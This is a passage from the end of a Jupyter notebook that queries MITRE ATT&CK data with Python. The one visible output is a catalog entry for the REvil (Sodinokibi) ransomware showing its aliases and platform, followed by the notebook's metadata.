object_marking_refs=['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'], x_mitre_aliases=['REvil', 'Sodin', 'Sodinokibi'], x_mitre_contributors=['Edward Millington'], x_mitre_platforms=['Windows'], x_mitre_version='1.0')"
      ]
     },
     "execution_count": 22,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "group_software[0]"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": []
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": "Python 3",
   "language": "python",
   "name": "python3"
  },
  "language_info": {
   "codemirror_mode": {
    "name": "ipython",
    "version": 3
   },
   "file_extension": ".py",
   "mimetype": "text/x-python",
   "name": "python",
   "nbconvert_exporter": "python",
   "pygments_lexer": "ipython3",
   "version": "3.8.5"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 4
}
